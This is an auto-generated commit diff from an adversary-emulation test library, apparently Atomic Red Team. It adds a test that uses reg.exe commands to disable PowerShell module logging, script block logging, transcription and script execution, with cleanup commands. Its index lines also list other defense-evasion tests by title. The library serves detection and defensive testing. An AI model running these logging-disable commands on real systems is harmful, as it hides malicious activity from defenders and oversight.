Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2022-03-18 20:07:16 +00:00
parent 84a753eb23
commit b4893d15ad
6 changed files with 67 additions and 2 deletions
@@ -505,6 +505,7 @@ defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Fea
 defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -335,6 +335,7 @@ defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Fea
 defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -780,6 +780,7 @@
  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -547,6 +547,7 @@
  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
  - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
  - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -32237,7 +32237,27 @@ defense-evasion:
          reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
        cleanup_command: |
          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
-          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Powershell Logging Disabled
+      auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+        see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+          reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
        name: command_prompt
        elevation_required: true
  T1601:
@@ -72,6 +72,8 @@ The Registry of a remote system may be modified to aid in execution of files as

 - [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry)

+- [Atomic Test #32 - Windows Powershell Logging Disabled](#atomic-test-32---windows-powershell-logging-disabled)
+

 <br/>

@@ -1152,7 +1154,46 @@ reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Sho
 #### Cleanup Commands:
 ```cmd
 reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
-reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #32 - Windows Powershell Logging Disabled
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
+see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95b25212-91a7-42ff-9613-124aca6845a8
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
+reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
 ```